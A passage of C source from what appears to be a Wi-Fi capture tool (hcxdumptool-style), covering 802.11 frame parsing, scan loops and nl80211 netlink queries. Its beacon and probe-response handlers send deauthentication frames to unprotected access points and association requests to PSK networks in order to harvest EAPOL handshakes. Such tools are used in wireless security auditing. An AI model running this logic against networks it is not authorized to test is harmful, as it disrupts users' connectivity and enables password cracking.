(ieee80211_beacon_proberesponse_t*)payloadptr; if((proberesponselen = payloadlen - IEEE80211_PROBERESPONSE_SIZE) < IEEE80211_IETAG_SIZE) return; for(i = 0; i < APLIST_MAX - 1; i++) { if(memcmp(macfrx->addr3, (aplist + i)->macap, ETH_ALEN) != 0) continue; (aplist + i)->tsakt = tsakt; if(((aplist + i)->status & AP_PROBERESPONSE) == 0) { writeepb(); #ifdef NMEAOUT if(fd_gps > 0) writegpwpl(i); #endif tshold = tsakt; (aplist + i)->status |= AP_PROBERESPONSE; } tagwalk_channel_essid_rsn(&(aplist + i)->ie, proberesponselen, proberesponse->ie); if((aplist + i)->ie.channel == 0) (aplist + i)->ie.channel = (scanlist + scanlistindex)->channel; if(((aplist + i)->ie.flags & APIE_ESSID) == APIE_ESSID) (aplist + i)->status |= AP_ESSID; return; } memset((aplist + i), 0, APLIST_SIZE); (aplist + i)->tsakt = tsakt; (aplist + i)->tshold1 = tsakt; (aplist + i)->tsauth = tsfirst; (aplist + i)->count = attemptapmax; memcpy((aplist + i)->macap, macfrx->addr3, ETH_ALEN); memcpy((aplist + i)->macclient, &macbc, ETH_ALEN); (aplist + i)->status |= AP_PROBERESPONSE; tagwalk_channel_essid_rsn(&(aplist + i)->ie, proberesponselen, proberesponse->ie); if((aplist + i)->ie.channel == 0) (aplist + i)->ie.channel = (scanlist + scanlistindex)->channel; if((aplist + i)->ie.channel != (scanlist + scanlistindex)->channel) return; if(((aplist + i)->ie.flags & APIE_ESSID) == APIE_ESSID) (aplist + i)->status |= AP_ESSID; if(deauthenticationflag == true) { if(((aplist + i)->ie.flags & AP_MFP) == 0) { if(((aplist + i)->ie.flags & APAKM_MASK) != 0) send_80211_deauthentication_fm_ap(macbc, (aplist + i)->macap, WLAN_REASON_CLASS3_FRAME_FROM_NONASSOC_STA); } } if(associationflag == true) { if((((aplist + i)->ie.flags & APRSNAKM_PSK) != 0) && (((aplist + i)->ie.flags & APIE_ESSID) == 0)) send_80211_authenticationrequestnoack(); } if(reassociationflag == true) { if(((aplist + i)->ie.flags & APRSNAKM_PSK) != 0) send_80211_reassociationrequest(i); } writeepb(); #ifdef NMEAOUT if(fd_gps > 0) writegpwpl(i); #endif qsort(aplist, i + 1, APLIST_SIZE, sort_aplist_by_tsakt); tshold = tsakt; return; } /*---------------------------------------------------------------------------*/ static inline __attribute__((always_inline)) void process80211beacon_rca(void) { static size_t i; static ieee80211_beacon_proberesponse_t *beacon; static u16 beaconlen; beacon = (ieee80211_beacon_proberesponse_t*)payloadptr; if((beaconlen = payloadlen - IEEE80211_BEACON_SIZE) < IEEE80211_IETAG_SIZE) return; for(i = 0; i < APLIST_MAX - 1; i++) { if(memcmp(macfrx->addr3, (aplist + i)->macap, ETH_ALEN) != 0) continue; (aplist + i)->tsakt = tsakt; if(((aplist + i)->status & AP_BEACON) == 0) (aplist + i)->status |= AP_BEACON; tagwalk_channel_essid_rsn(&(aplist + i)->ie, beaconlen, beacon->ie); if((aplist + i)->ie.channel == 0) (aplist + i)->ie.channel = (scanlist + scanlistindex)->channel; if((aplist + i)->ie.channel != (scanlist + scanlistindex)->channel) return; (aplist + i)->count = (scanlist + scanlistindex)->frequency; return; } memset((aplist + i), 0, APLIST_SIZE); (aplist + i)->tsakt = tsakt; (aplist + i)->tshold1 = tsakt; (aplist + i)->tsauth = tsfirst; (aplist + i)->count = attemptapmax; memcpy((aplist + i)->macap, macfrx->addr3, ETH_ALEN); memcpy((aplist + i)->macclient, &macbc, ETH_ALEN); (aplist + i)->status |= AP_BEACON; tagwalk_channel_essid_rsn(&(aplist + i)->ie, beaconlen, beacon->ie); if((aplist + i)->ie.channel == 0) (aplist + i)->ie.channel = (scanlist + scanlistindex)->channel; if((aplist + i)->ie.channel != (scanlist + scanlistindex)->channel) return; (aplist + i)->count = (scanlist + scanlistindex)->frequency; qsort(aplist, i + 1, APLIST_SIZE, sort_aplist_by_tsakt); return; } /*---------------------------------------------------------------------------*/ static inline __attribute__((always_inline)) void process80211beacon(void) { static size_t i; static ieee80211_beacon_proberesponse_t *beacon; static u16 beaconlen; beacon = (ieee80211_beacon_proberesponse_t*)payloadptr; if((beaconlen = payloadlen - IEEE80211_BEACON_SIZE) < IEEE80211_IETAG_SIZE) return; for(i = 0; i < APLIST_MAX - 1; i++) { if(memcmp(macfrx->addr3, (aplist + i)->macap, ETH_ALEN) != 0) continue; (aplist + i)->tsakt = tsakt; if(((aplist + i)->status & AP_BEACON) == 0) { writeepb(); tshold = tsakt; #ifdef NMEAOUT if(fd_gps > 0) writegpwpl(i); #endif (aplist + i)->status |= AP_BEACON; } if((aplist + i)->status >= AP_EAPOL_M3) return; tagwalk_channel_essid_rsn(&(aplist + i)->ie, beaconlen, beacon->ie); if((aplist + i)->ie.channel == 0) (aplist + i)->ie.channel = (scanlist + scanlistindex)->channel; if((aplist + i)->ie.channel != (scanlist + scanlistindex)->channel) return; if((aplist + i)->tsakt - (aplist + i)->tshold1 > TIMEBEACONNEW) { (aplist + i)->count = attemptapmax; memcpy((aplist + i)->macclient, &macbc, ETH_ALEN); (aplist + i)->tshold1 = tsakt; } if((aplist + i)->count == 0) return; if(associationflag == true) { if(((aplist + i)->count % 8) == 6) { if(((aplist + i)->status & AP_EAPOL_M1) == 0) { if(((aplist + i)->status & AP_ESSID) == AP_ESSID) { if(((aplist + i)->ie.flags & APRSNAKM_PSK) != 0) send_80211_authenticationrequest(); } } } } if(deauthenticationflag == true) { if(((aplist + i)->count % 8) == 4) { if(((aplist + i)->ie.flags & AP_MFP) == 0) { if(((aplist + i)->ie.flags & APAKM_MASK) != 0) { if(memcmp(&macbc, (aplist + i)->macclient, ETH_ALEN) != 0) { send_80211_deauthentication_fm_ap((aplist + i)->macclient, (aplist + i)->macap, WLAN_REASON_CLASS3_FRAME_FROM_NONASSOC_STA); send_80211_deauthentication_fm_client((aplist + i)->macclient, (aplist + i)->macap, WLAN_REASON_DEAUTH_LEAVING); } else send_80211_deauthentication_fm_ap(macbc, (aplist + i)->macap, WLAN_REASON_CLASS3_FRAME_FROM_NONASSOC_STA); } } } } if(reassociationflag == true) { if(((aplist + i)->count % 8) == 2) { if(((aplist + i)->ie.flags & APRSNAKM_PSK) != 0) send_80211_associationrequest_org(i); } if(((aplist + i)->count % 8) == 0) { if(((aplist + i)->ie.flags & APRSNAKM_PSK) != 0) send_80211_reassociationrequest(i); } } (aplist + i)->count -= 1; return; } memset((aplist + i), 0, APLIST_SIZE); (aplist + i)->tsakt = tsakt; (aplist + i)->tshold1 = tsakt; (aplist + i)->tsauth = tsfirst; (aplist + i)->count = attemptapmax; memcpy((aplist + i)->macap, macfrx->addr3, ETH_ALEN); memcpy((aplist + i)->macclient, &macbc, ETH_ALEN); (aplist + i)->status |= AP_BEACON; tagwalk_channel_essid_rsn(&(aplist + i)->ie, beaconlen, beacon->ie); if((aplist + i)->ie.channel == 0) (aplist + i)->ie.channel = (scanlist + scanlistindex)->channel; if((aplist + i)->ie.channel != (scanlist + scanlistindex)->channel) return; if(((aplist + i)->ie.flags & APIE_ESSID) == APIE_ESSID) (aplist + i)->status |= AP_ESSID; if(deauthenticationflag == true) { if(((aplist + i)->ie.flags & AP_MFP) == 0) { if(((aplist + i)->ie.flags & APAKM_MASK) != 0) send_80211_deauthentication_fm_ap(macbc, (aplist + i)->macap, WLAN_REASON_CLASS3_FRAME_FROM_NONASSOC_STA); } } if(associationflag == true) { if((((aplist + i)->ie.flags & APRSNAKM_PSK) != 0) && (((aplist + i)->ie.flags & APIE_ESSID) == 0)) send_80211_authenticationrequestnoack(); } if(proberequestflag == true) { if(((aplist + i)->ie.flags & APIE_ESSID) == 0) send_80211_proberequest_undirected(); } if(reassociationflag == true) { if(((aplist + i)->ie.flags & APRSNAKM_PSK) != 0) send_80211_associationrequest_org(i); } writeepb(); #ifdef NMEAOUT if(fd_gps > 0) writegpwpl(i); #endif qsort(aplist, i + 1, APLIST_SIZE, sort_aplist_by_tsakt); tshold = tsakt; return; } /*===========================================================================*/ /*===========================================================================*/ #ifdef NMEAOUT static inline __attribute__((always_inline)) void process_nmea0183(void) { static char *nmeaptr; static const char *gprmcid = "$GPRMC,"; static const char *gpggaid = "$GPGGA,"; if((nmealen = read(fd_gps, nmeabuffer, NMEA_SIZE)) < NMEA_MIN) { if(packetlen == - 1) errorcount++; return; } nmeabuffer[nmealen] = 0; if((nmeaptr = strstr(nmeabuffer, gprmcid)) != NULL) { gprmclen = 0; while(gprmclen < (NMEA_MSG_MAX -2)) { if(nmeaptr[gprmclen] == '*') { gprmclen += NMEA_CS_CR_LF_SIZE; memcpy(&gprmc, nmeaptr, gprmclen); break; } gprmclen++; } } if((nmeaptr = strstr(nmeabuffer, gpggaid)) != NULL) { gpggalen = 0; while(gpggalen < (NMEA_MSG_MAX -2)) { if(nmeaptr[gpggalen] == '*') { gpggalen += NMEA_CS_CR_LF_SIZE; memcpy(&gpgga, nmeaptr, gpggalen); return; } gpggalen++; } } return; } #endif /*===========================================================================*/ static inline __attribute__((always_inline)) void process_packet_rca(void) { if((packetlen = read(fd_socket_rx, packetptr, PCAPNG_SNAPLEN)) < RTHRX_SIZE) { if(packetlen == - 1) errorcount++; return; } rth = (rth_t*)packetptr; #ifndef __LITTLE_ENDIAN__ if((rth->it_present & IEEE80211_RADIOTAP_DBM_ANTSIGNAL) == 0) return; if(rth->it_len > packetlen) { errorcount++; return; } ieee82011ptr = packetptr + rth->it_len; ieee82011len = packetlen - rth->it_len; #else if((le32toh(rth->it_present) & IEEE80211_RADIOTAP_DBM_ANTSIGNAL) == 0) return; if(le16toh(rth->it_len) > packetlen) { errorcount++; return; } ieee82011ptr = packetptr + le16toh(rth->it_len); ieee82011len = packetlen - le16toh(rth->it_len); #endif if(ieee82011len <= MAC_SIZE_RTS) return; macfrx = (ieee80211_mac_t*)ieee82011ptr; if((macfrx->from_ds == 1) && (macfrx->to_ds == 1)) { payloadptr = ieee82011ptr +MAC_SIZE_LONG; payloadlen = ieee82011len -MAC_SIZE_LONG; } else { payloadptr = ieee82011ptr +MAC_SIZE_NORM; payloadlen = ieee82011len -MAC_SIZE_NORM; } clock_gettime(CLOCK_REALTIME, &tspecakt); tsakt = ((u64)tspecakt.tv_sec * 1000000000ULL) + tspecakt.tv_nsec; packetcount++; if(macfrx->type == IEEE80211_FTYPE_MGMT) { if(macfrx->subtype == IEEE80211_STYPE_BEACON) process80211beacon_rca(); else if(macfrx->subtype == IEEE80211_STYPE_PROBE_RESP) process80211proberesponse_rca(); } return; } /*---------------------------------------------------------------------------*/ static inline __attribute__((always_inline)) void process_packet(void) { if((packetlen = read(fd_socket_rx, packetptr, PCAPNG_SNAPLEN)) < RTHRX_SIZE) { if(packetlen == -1) errorcount++; return; } rth = (rth_t*)packetptr; #ifndef __LITTLE_ENDIAN__ if((rth->it_present & IEEE80211_RADIOTAP_DBM_ANTSIGNAL) == 0) return; if(rth->it_len > packetlen) { errorcount++; return; } ieee82011ptr = packetptr + rth->it_len; ieee82011len = packetlen - rth->it_len; #else if((le32toh(rth->it_present) & IEEE80211_RADIOTAP_DBM_ANTSIGNAL) == 0) return; if(le16toh(rth->it_len) > packetlen) { errorcount++; return; } ieee82011ptr = packetptr + le16toh(rth->it_len); ieee82011len = packetlen - le16toh(rth->it_len); #endif if(ieee82011len <= MAC_SIZE_RTS) return; macfrx = (ieee80211_mac_t*)ieee82011ptr; if((macfrx->from_ds == 1) && (macfrx->to_ds == 1)) { payloadptr = ieee82011ptr +MAC_SIZE_LONG; payloadlen = ieee82011len -MAC_SIZE_LONG; } else { payloadptr = ieee82011ptr +MAC_SIZE_NORM; payloadlen = ieee82011len -MAC_SIZE_NORM; } clock_gettime(CLOCK_REALTIME, &tspecakt); tsakt = ((u64)tspecakt.tv_sec * 1000000000ULL) + tspecakt.tv_nsec; packetcount++; if(macfrx->type == IEEE80211_FTYPE_MGMT) { if(macfrx->subtype == IEEE80211_STYPE_BEACON) process80211beacon(); else if(macfrx->subtype == IEEE80211_STYPE_PROBE_RESP) process80211proberesponse(); else if(macfrx->subtype == IEEE80211_STYPE_PROBE_REQ) { if(memcmp(&macbc, macfrx->addr3, ETH_ALEN) == 0) process80211proberequest_undirected(); else process80211proberequest_directed(); } else if(macfrx->subtype == IEEE80211_STYPE_AUTH) process80211authentication(); else if(macfrx->subtype == IEEE80211_STYPE_ASSOC_REQ) process80211associationrequest(); else if(macfrx->subtype == IEEE80211_STYPE_ASSOC_RESP) process80211associationresponse(); else if(macfrx->subtype == IEEE80211_STYPE_REASSOC_REQ)process80211reassociationrequest(); else if(macfrx->subtype == IEEE80211_STYPE_REASSOC_RESP) process80211reassociationresponse(); else if(macfrx->subtype == IEEE80211_STYPE_ACTION) process80211action(); } else if(macfrx->type == IEEE80211_FTYPE_CTL) { if(macfrx->subtype == IEEE80211_STYPE_BACK) process80211blockack(); else if(macfrx->subtype == IEEE80211_STYPE_BACK) process80211blockackreq(); else if(macfrx->subtype == IEEE80211_STYPE_PSPOLL) process80211pspoll(); } else if(macfrx->type == IEEE80211_FTYPE_DATA) { if((macfrx->subtype &IEEE80211_STYPE_QOS_DATA) == IEEE80211_STYPE_QOS_DATA) { payloadptr += IEEE80211_QOS_SIZE; payloadlen -= IEEE80211_QOS_SIZE; } if(payloadlen > IEEE80211_LLC_SIZE) { llcptr = payloadptr; llc = (ieee80211_llc_t*)llcptr; if(((ntohs(llc->type)) == LLC_TYPE_AUTH) && (llc->dsap == IEEE80211_LLC_SNAP) && (llc->ssap == IEEE80211_LLC_SNAP)) process80211eapauthentication(); } if((macfrx->subtype &IEEE80211_STYPE_QOS_NULLFUNC) == IEEE80211_STYPE_QOS_NULLFUNC) process80211qosnull(); else if((macfrx->subtype &IEEE80211_STYPE_NULLFUNC) == IEEE80211_STYPE_NULLFUNC) process80211null(); else if((macfrx->subtype &IEEE80211_STYPE_QOS_DATA) == IEEE80211_STYPE_QOS_DATA) process80211qosdata(); } return; } /*===========================================================================*/ /*===========================================================================*/ /* MAIN SCAN LOOP */ static bool nl_scanloop(void) { static ssize_t i; static int fd_epoll = 0; static int epi = 0; static int epret = 0; static struct epoll_event ev, events[EPOLL_EVENTS_MAX]; static size_t packetcountlast = 0; static u64 timer1count; static struct timespec sleepled; if((fd_epoll= epoll_create(1)) < 0) return false; ev.data.fd = fd_socket_rx; ev.events = EPOLLIN; if(epoll_ctl(fd_epoll, EPOLL_CTL_ADD, fd_socket_rx, &ev) < 0) return false; epi++; ev.data.fd = fd_timer1; ev.events = EPOLLIN; if(epoll_ctl(fd_epoll, EPOLL_CTL_ADD, fd_timer1, &ev) < 0) return false; epi++; #ifdef NMEAOUT if(fd_gps > 0) { ev.data.fd = fd_gps; ev.events = EPOLLIN; if(epoll_ctl(fd_epoll, EPOLL_CTL_ADD, fd_gps, &ev) < 0) return false; epi++; } #endif sleepled.tv_sec = 0; sleepled.tv_nsec = GPIO_LED_DELAY; while(!wanteventflag) { if(errorcount > errorcountmax) wanteventflag |= EXIT_ON_ERROR; epret = epoll_pwait(fd_epoll, events, epi, timerwaitnd, NULL); if(epret == -1) { if(errno != EINTR) errorcount++; continue; } for(i = 0; i < epret; i++) { if(events[i].data.fd == fd_socket_rx) process_packet(); else if(events[i].data.fd == fd_timer1) { if(read(fd_timer1, &timer1count, sizeof(u64)) == -1) errorcount++; lifetime++; clock_gettime(CLOCK_REALTIME, &tspecakt); tsakt = ((u64)tspecakt.tv_sec * 1000000000ULL) + tspecakt.tv_nsec; #ifdef STATUSOUT show_realtime(); #endif if((tsakt - tshold) > timehold) { scanlistindex++; if(nl_set_frequency() == false) errorcount++; tshold = tsakt; } #ifdef NMEAOUT if(((lifetime % 2) == 0) && (nmea2pcapflag == true)) { if((gpggalen > 2) || (gprmclen > 2)) writecbnmea(); } #endif if((lifetime % 10) == 0) { if(gpiostatusled > 0) { GPIO_SET = 1 << gpiostatusled; nanosleep(&sleepled, NULL); GPIO_CLR = 1 << gpiostatusled; } if(gpiobutton > 0) { if(GET_GPIO(gpiobutton) > 0) { wanteventflag |= EXIT_ON_GPIOBUTTON; if(gpiostatusled > 0) GPIO_SET = 1 << gpiostatusled; } } } if((tottime > 0) && (lifetime >= tottime)) wanteventflag |= EXIT_ON_TOT; if((lifetime % watchdogcountmax) == 0) { if(packetcount == packetcountlast) wanteventflag |= EXIT_ON_WATCHDOG; packetcountlast = packetcount; } } #ifdef NMEAOUT else if(events[i].data.fd == fd_gps) process_nmea0183(); #endif } if(epret == 0) send_80211_beacon(); } return true; } /*===========================================================================*/ /* RCA SCAN LOOP */ static bool nl_scanloop_rca(const char *rcatypeflag) { static ssize_t i; static int fd_epoll = 0; static int epi = 0; static int epret = 0; static struct epoll_event ev, events[EPOLL_EVENTS_MAX]; static size_t packetcountlast = 0; static u64 timer1count; static struct timespec sleepled; if((fd_epoll= epoll_create(1)) < 0) return false; ev.data.fd = fd_socket_rx; ev.events = EPOLLIN; if(epoll_ctl(fd_epoll, EPOLL_CTL_ADD, fd_socket_rx, &ev) < 0) return false; epi++; ev.data.fd = fd_timer1; ev.events = EPOLLIN; if(epoll_ctl(fd_epoll, EPOLL_CTL_ADD, fd_timer1, &ev) < 0) return false; epi++; sleepled.tv_sec = 0; sleepled.tv_nsec = GPIO_LED_DELAY; while(!wanteventflag) { if(errorcount > errorcountmax) wanteventflag |= EXIT_ON_ERROR; epret = epoll_pwait(fd_epoll, events, epi, timerwaitnd, NULL); if(epret == -1) { if(errno != EINTR) errorcount++; continue; } for(i = 0; i < epret; i++) { if(events[i].data.fd == fd_socket_rx) process_packet_rca(); else if(events[i].data.fd == fd_timer1) { if(read(fd_timer1, &timer1count, sizeof(u64)) == -1) errorcount++; lifetime++; clock_gettime(CLOCK_REALTIME, &tspecakt); tsakt = ((u64)tspecakt.tv_sec * 1000000000ULL) + tspecakt.tv_nsec; if((lifetime % 5) == 0) show_realtime_rca(); if((lifetime % 2) == 0) { scanlistindex++; if(nl_set_frequency() == false) errorcount++; } if(rcatypeflag[0] == 'a') send_80211_proberequest_undirected(); if((lifetime % 10) == 0) { if(gpiostatusled > 0) { GPIO_SET = 1 << gpiostatusled; nanosleep(&sleepled, NULL); GPIO_CLR = 1 << gpiostatusled; } if(gpiobutton > 0) { if(GET_GPIO(gpiobutton) > 0) { wanteventflag |= EXIT_ON_GPIOBUTTON; if(gpiostatusled > 0) GPIO_SET = 1 << gpiostatusled; } } } if((tottime > 0) && (lifetime >= tottime)) wanteventflag |= EXIT_ON_TOT; if((lifetime % watchdogcountmax) == 0) { if(packetcount == packetcountlast) wanteventflag |= EXIT_ON_WATCHDOG; packetcountlast = packetcount; } } } } return true; } /*===========================================================================*/ /*===========================================================================*/ /* NETLINK */ static struct nlattr *nla_next(const struct nlattr *nla, int *remaining) { int totlen = NLA_ALIGN(nla->nla_len); *remaining -= totlen; return (struct nlattr*)((u8*)nla + totlen); } /*---------------------------------------------------------------------------*/ static int nla_ok(const struct nlattr *nla, int remaining) { size_t r = remaining; return r >= sizeof(*nla) && nla->nla_len >= sizeof(*nla) && nla->nla_len <= r; } /*---------------------------------------------------------------------------*/ static int nla_datalen(const struct nlattr *nla) { return nla->nla_len - NLA_HDRLEN; } /*---------------------------------------------------------------------------*/ static void *nla_data(const struct nlattr *nla) { return (u8*)nla + NLA_HDRLEN; } /*---------------------------------------------------------------------------*/ static void nl_get_supported_bands(interface_t *ipl, struct nlattr* nla) { static int nlanremlen; static struct nlattr *nlai, *nlan; static frequencylist_t *freql; nlai = (struct nlattr*)nla_data(nla); nlan = (struct nlattr*)nla_data(nlai); if(nlan->nla_type != NL80211_BAND_ATTR_FREQS) return; nlai = (struct nlattr*)nla_data(nlan); nlanremlen = nlai->nla_len - sizeof(struct nlattr); nlan = (struct nlattr*)nla_data(nlai); freql = ipl->frequencylist; if(ipl->i > FREQUENCYLIST_MAX -1) return; (freql + ipl->i)->frequency = 0; (freql + ipl->i)->pwr = 0; (freql + ipl->i)->status = 0; while(nla_ok(nlan, nlanremlen)) { if(nlan->nla_type == NL80211_FREQUENCY_ATTR_FREQ) { (freql + ipl->i)->frequency = *((u32*)nla_data(nlan)); (freql + ipl->i)->channel = frequency_to_channel((freql + ipl->i)->frequency); } if(nlan->nla_type == NL80211_FREQUENCY_ATTR_MAX_TX_POWER) (freql + ipl->i)->pwr = *((u32*)nla_data(nlan)); if(nlan->nla_type == NL80211_FREQUENCY_ATTR_DISABLED) (freql + ipl->i)->status = IF_STAT_FREQ_DISABLED; nlan = nla_next(nlan, &nlanremlen); } if((freql + ipl->i)->frequency != 0) ipl->i++; return; } /*---------------------------------------------------------------------------*/ static u8 nl_get_supported_iftypes(struct nlattr* nla) { struct nlattr *pos = (struct nlattr*)nla_data(nla); int nestremlen = nla_datalen(nla); while(nla_ok(pos, nestremlen)) { if(pos->nla_type == NL80211_IFTYPE_MONITOR) return IF_HAS_MONITOR; pos = nla_next(pos, &nestremlen); } return 0; } /*---------------------------------------------------------------------------*/ static bool nl_get_interfacelist(void) { static ssize_t i; static size_t ii; static ssize_t msglen; static int nlremlen = 0; static u32 ifindex; static u32 wiphy; static struct nlmsghdr *nlh; static struct genlmsghdr *glh; static struct nlattr *nla; static struct nlmsgerr *nle; static char ifname[IF_NAMESIZE]; static u8 vimac[ETH_ALEN]; i = 0; nlh = (struct nlmsghdr*)nltxbuffer; nlh->nlmsg_type = nlfamily; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP | NLM_F_ACK; nlh->nlmsg_seq = nlseqcounter++; nlh->nlmsg_pid = hcxpid; i += sizeof(struct nlmsghdr); glh = (struct genlmsghdr*)(nltxbuffer + i); glh->cmd = NL80211_CMD_GET_INTERFACE; glh->version = 1; glh->reserved = 0; i += sizeof(struct genlmsghdr); nlh->nlmsg_len = i; if((write(fd_socket_nl, nltxbuffer, i)) != i) return false; ii = 0; while(1) { msglen = read(fd_socket_nl, &nlrxbuffer, NLRX_SIZE); if(msglen == -1) break; if(msglen == 0) break; for(nlh = (struct nlmsghdr*)nlrxbuffer; NLMSG_OK(nlh, (u32)msglen); nlh = NLMSG_NEXT(nlh, msglen)) { if(nlh->nlmsg_type == NLMSG_DONE) return true; if(nlh->nlmsg_type == NLMSG_ERROR) { nle = (struct nlmsgerr*)(nlrxbuffer + sizeof(struct nlmsghdr)); if(nle->error == 0) return true; errorcount++; nlfamily = 0; return false; } glh = (struct genlmsghdr*)NLMSG_DATA(nlh); if(glh->cmd != NL80211_CMD_NEW_INTERFACE) continue; nla = (struct nlattr*)(NLMSG_DATA(nlh) + sizeof(struct genlmsghdr)); nlremlen = NLMSG_PAYLOAD(nlh, 0) -4; while(nla_ok(nla, nlremlen)) { if(nla->nla_type == NL80211_ATTR_IFINDEX) ifindex = *((u32*)nla_data(nla)); if(nla->nla_type == NL80211_ATTR_IFNAME) strncpy(ifname, nla_data(nla), IF_NAMESIZE -1); if(nla->nla_type == NL80211_ATTR_WIPHY) { wiphy = *((u32*)nla_data(nla)); } if(nla->nla_type == NL80211_ATTR_MAC) { if(nla->nla_len == 10) memcpy(vimac, nla_data(nla), ETH_ALEN); } nla = nla_next(nla, &nlremlen); } for(ii = 0; ii < INTERFACELIST_MAX; ii++) { if((ifpresentlist + ii)->wiphy == wiphy) { (ifpresentlist + ii)->index = ifindex; strncpy((ifpresentlist + ii)->name, ifname, IF_NAMESIZE); memcpy((ifpresentlist + ii)->vimac, &vimac, ETH_ALEN); break; } } } } return false; } /*---------------------------------------------------------------------------*/ static bool nl_get_interfacestatus(void) { static ssize_t i; static ssize_t msglen; static int nlremlen = 0; static struct nlmsghdr *nlh; static struct genlmsghdr *glh; static struct nlattr *nla; static struct nlmsgerr *nle; i = 0; nlh = (struct nlmsghdr*)nltxbuffer; nlh->nlmsg_type = nlfamily; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; nlh->nlmsg_seq = nlseqcounter++; nlh->nlmsg_pid = hcxpid; i += sizeof(struct nlmsghdr); glh = (struct genlmsghdr*)(nltxbuffer + i); glh->cmd = NL80211_CMD_GET_INTERFACE; glh->version = 1; glh->reserved = 0; i += sizeof(struct genlmsghdr); nla = (struct nlattr*)(nltxbuffer + i); nla->nla_len = 8; nla->nla_type = NL80211_ATTR_IFINDEX; *(u32*)nla_data(nla) = ifaktindex; i += 8; nlh->nlmsg_len = i; if((write(fd_socket_nl, nltxbuffer, i)) != i) return false; while(1) { msglen = read(fd_socket_nl, &nlrxbuffer, NLRX_SIZE); if(msglen == -1) break; if(msglen == 0) break; for(nlh = (struct nlmsghdr*)nlrxbuffer; NLMSG_OK(nlh, (u32)msglen); nlh = NLMSG_NEXT(nlh, msglen)) { if(nlh->nlmsg_type == NLMSG_DONE) return true; if(nlh->nlmsg_type == NLMSG_ERROR) { nle = (struct nlmsgerr*)(nlrxbuffer + sizeof(struct nlmsghdr)); if(nle->error == 0) return true; errorcount++; nlfamily = 0; return false; } glh = (struct genlmsghdr*)NLMSG_DATA(nlh); if(glh->cmd != NL80211_CMD_NEW_INTERFACE) continue; nla = (struct nlattr*)(NLMSG_DATA(nlh) + sizeof(struct genlmsghdr)); nlremlen = NLMSG_PAYLOAD(nlh, 0) -4; while(nla_ok(nla, nlremlen)) { if(nla->nla_type == NL80211_ATTR_IFTYPE) { if(*((u32*)nla_data(nla)) == NL80211_IFTYPE_MONITOR) ifaktstatus |= IF_STAT_MONITOR; } nla = nla_next(nla, &nlremlen); } } } return false; } /*---------------------------------------------------------------------------*/ static bool nl_get_regulatorydomain(void) { static ssize_t i; static ssize_t msglen; static int nlremlen = 0; static struct nlmsghdr *nlh; static struct genlmsghdr *glh; static struct nlattr *nla; static struct nlmsgerr *nle; country[0] = 0; country[1] = 0; country[2] = 0; i = 0; nlh = (struct nlmsghdr*)nltxbuffer; nlh->nlmsg_type = nlfamily; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; nlh->nlmsg_seq = nlseqcounter++; nlh->nlmsg_pid = hcxpid; i += sizeof(struct nlmsghdr); glh = (struct genlmsghdr*)(nltxbuffer + i); glh->cmd = NL80211_CMD_GET_REG; glh->version = 1; glh->reserved = 0; i += sizeof(struct genlmsghdr); nlh->nlmsg_len = i; if((write(fd_socket_nl, nltxbuffer, i)) != i) return false; while(1) { msglen = read(fd_socket_nl, &nlrxbuffer, NLRX_SIZE); if(msglen == -1) break; if(msglen == 0) break; for(nlh = (struct nlmsghdr*)nlrxbuffer; NLMSG_OK(nlh, (u32)msglen); nlh = NLMSG_NEXT(nlh, msglen)) { if(nlh->nlmsg_type == NLMSG_DONE) return true; if(nlh->nlmsg_type == NLMSG_ERROR) { nle = (struct nlmsgerr*)(nlrxbuffer + sizeof(struct nlmsghdr)); if(nle->error == 0) return true; errorcount++; nlfamily = 0; return false; } glh = (struct genlmsghdr*)NLMSG_DATA(nlh); if(glh->cmd != NL80211_CMD_GET_REG) continue; nla = (struct nlattr*)(NLMSG_DATA(nlh) + sizeof(struct genlmsghdr)); nlremlen = NLMSG_PAYLOAD(nlh, 0) -4; while(nla_ok(nla, nlremlen)) { if(nla->nla_type == NL80211_ATTR_REG_ALPHA2) { if(nla->nla_len == 7) memcpy(country, nla_data(nla), 2); } nla = nla_next(nla, &nlremlen); } } } return false; } /*---------------------------------------------------------------------------*/ static bool nl_get_interfacecapabilities(void) { static ssize_t i; static ssize_t ii; static ssize_t msglen; static int nlremlen; static size_t dnlen; static struct nlmsghdr *nlh; static struct genlmsghdr *glh; static struct nlattr *nla; static struct nlmsgerr *nle; static char *drivername = NULL; static char driverfmt[128] = { 0 }; static char driverlink[128] = { 0 }; nlh = (struct nlmsghdr*)nltxbuffer; nlh->nlmsg_type = nlfamily; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP | NLM_F_ACK; nlh->nlmsg_seq = nlseqcounter++; nlh->nlmsg_pid = hcxpid; i += sizeof(struct nlmsghdr); glh = (struct genlmsghdr*)(nltxbuffer + i); glh->cmd = NL80211_CMD_GET_WIPHY; glh->version = 1; glh->reserved = 0; i += sizeof(struct genlmsghdr); nla = (struct nlattr*)(nltxbuffer + i); nla->nla_len = 4; nla->nla_type = NL80211_ATTR_SPLIT_WIPHY_DUMP; *(u32*)nla_data(nla) = ifaktindex; i += 4; nlh->nlmsg_len = i; if((write(fd_socket_nl, nltxbuffer, i)) != i) return false; ii = 0; while(1) { msglen = read(fd_socket_nl, &nlrxbuffer, NLRX_SIZE); if(msglen == -1) break; if(msglen == 0) break; for(nlh = (struct nlmsghdr*)nlrxbuffer; NLMSG_OK(nlh, (u32)msglen); nlh = NLMSG_NEXT(nlh, msglen)) { if(nlh->nlmsg_type == NLMSG_DONE) return true; if(nlh->nlmsg_type == NLMSG_ERROR) { nle = (struct nlmsgerr*)(nlrxbuffer + sizeof(struct nlmsghdr)); if(nle->error == 0) return true; errorcount++; return false; } nlremlen = 0; glh = (struct genlmsghdr*)NLMSG_DATA(nlh); if(glh->cmd != NL80211_CMD_NEW_WIPHY) continue; nla = (struct nlattr*)(NLMSG_DATA(nlh) + sizeof(struct genlmsghdr)); nlremlen = NLMSG_PAYLOAD(nlh, 0) -4; while(nla_ok(nla, nlremlen)) { if(nla->nla_type == NL80211_ATTR_WIPHY) { (ifpresentlist + ii)->wiphy = *((u32*)nla_data(nla)); snprintf(driverfmt, 64, "/sys/class/ieee80211/phy%d/device/driver", (ifpresentlist + ii)->wiphy); memset(&driverlink, 0, 128); if((dnlen = readlink(driverfmt, driverlink, 64)) > 0) { drivername = basename(driverlink); if(drivername != NULL) strncpy((ifpresentlist + ii)->driver, drivername, DRIVERNAME_MAX -1); } } if(nla->nla_type == NL80211_ATTR_SUPPORTED_IFTYPES) { (ifpresentlist + ii)->type |= 